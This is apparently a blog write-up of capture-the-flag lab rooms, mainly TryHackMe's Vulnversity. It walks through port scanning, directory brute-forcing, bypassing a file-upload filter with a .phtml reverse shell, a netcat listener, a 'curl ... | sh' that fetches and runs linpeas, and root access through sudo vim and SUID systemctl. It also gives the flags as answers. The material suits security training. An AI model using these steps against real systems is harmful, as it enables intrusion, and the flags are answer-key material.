ssh

That shows us that the password can be used with ssh.


What's the user flag?

We can see one file in the directory we start in, which is Mitch's home directory. Reading the file gives us the flag: G00d j0b, keep up!

user flag


Is there any other user in the home directory? What's its name?

If you do ls /home, you can see another user named: sunbath


What can you leverage to spawn a privileged shell?

If you run the command root -l, it will show you what the user can run as root, and whether it requires a password:

sudo -l command

This shows us that Mitch may run /usr/bin/vim (Vim) without a password.


What's the root flag?

Head over to gtfobins, a great list of Unix binaries that can be used for privilege escalation. Type "vim" into the searchbar (because we know vim can be run as super user) and click on "Sudo".

vim sudo

Run this command on the ssh shell and you will become root:

becoming root

Congrats! You are now root simply because of a misconfigured vim.

root

The flag is W3ll d0n3. You made it!!

Happy hacking 🙂

Vulnversity

Vulnversity

Armand Alvarez | 17 July 2021


Task 1: Deploy the machine

Task 2: Reconnaissance

Nmap scan

First lets perform an nmap scan!

21 - ftp - vsftpd 3.0.3
22 - ssh - OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139 - netbios-ssn Samba smbd 3.x - 4.x
445 - ' ' smbd 4.3.11-Ubuntu
3128 - http-proxy - Squid http proxy 3.5.12
3333 - http - Apache httpd 2.4.18

Questions

  • Scan the box, how many ports are open?
    6

  • What version of the squid proxy is running on the machine?
    3.5.12

  • How many ports will nmap scan if the flag -p-400 was used?
    400

    • This does a port scan of ports 1 - 400
  • Using the nmap flag -n what will it not resolve?
    DNS

  • What is the most likely operating system this machine is running?
    Ubuntu

    • Found on smb-os-discovery
  • What port is the web server running on?
    3333

    • The port with http service

Task 3: Locating directories using GoBuster

So, since we know that there is an http service on port 3333, we can try to bust or brute force the names of the directories using a really cool tool called GoBuster.

Command Breakdown

Lets break down our command real quick and what we are looking at:

gobuster dir -u http://10.10.99.117:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster.txt

  • gobuster dir -- Directs gobuster to work in directory enumeration mode
  • -u http://10.10.99.117:3333 -- Tells gobuster to scan our box (that is the IP of the box we are trying to get into for me, it may be different when you do this CTF.) The :3333 tells gobuster to use port 3333 (by default it uses port 80)
  • -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -- Specifies the wordlist to use when enumerating through possible directories. This is a pretty good wordlist to use that comes installed stock in Kali linux.

Output Breakdown

We see that our ip address has the directories:

  • /images
  • /css
  • /js
  • /fonts
  • /internal

The /internal directory looks interesting....

Questions

  • What is the directory that has an upload form page?
    /internal/

Task 4: Compromise the webserver

Lets see what internal page looks like...

We can upload a file and submit it. But it looks like this does NOT work with .pl files. Instead of manually trying a bunch of different file types, we can use BurpSuite to do this automatically.

Turn on your Burp proxy and send the .pl file so that it gets rejected.

Then send that POST request to the intruder.

Under the Intruder->Positions tab, select the file extention. We do this because all we are enumerating is which file extention is allowed, we don't actually care about the contents of the file at this point in time.

Under the Intruder->Payload Options, put a list of common extention types like .php, .php5, .phtml, etc.

** Make sure you un-check "URL-encode these characters", otherwise it won't work.

Looking at the results, the .phtml extention works!

Now lets upload a reverse php shell

First, download the reverse shell provided

Secondly, open a netcat connection to port 1234

nc -lvnp 1234

After making the changes that the TryHackMe page recommends, you can upload the shell to the page. Navigate to /uploads to see your file, then click it to form the connection!

Exploring

We can explore the webserver a little bit for some more information.

Typing whoami will show that we are logged in as www-data

Looking in the home directory will show only one user: Bill. He probably owns this webserver...

He only has one file in his directory. Probably the flag...

Questions

  • Try upload a few file types to the server, what common extension seems to be blocked?
    .php.

  • Run this attack, what extension is allowed?
    .phtml

  • What is the name of the user who manages the webserver?
    bill

  • What is the user flag?
    8bd7992fbe8a6ad22a63361004cfcedb


Task 5: Privilege Escalation

linpeas

I solved this a little differently from the THM page.

First, I downloaded the linpeas.sh file from their website (you can google linpeas to find the github page, just click on the linpeas.sh file and download the raw file as linpeas.sh)

Second, on another terminal tab, type python -m SimpleHTTPServer 80
This starts an HTTP server on your IP

Then, back in your webserver netcat connection, type curl http://<your ip>/linpeas.sh | sh
This will download the linpeas file from the directory you started the HTTP server from and run it on the box.

The results tell us a lot of options we can use for privilege escalation, but one of them sticks out.

By having systemctl under SUID, we can use that to escalate privileges because we can run it as root despite not having root access.

Privilege Escalation

Lets follow the process here to take advantage of the misconfigured systemctl.

Once you create and upload your root.service file, execute it to become root!

You should be able to find the last flag 😉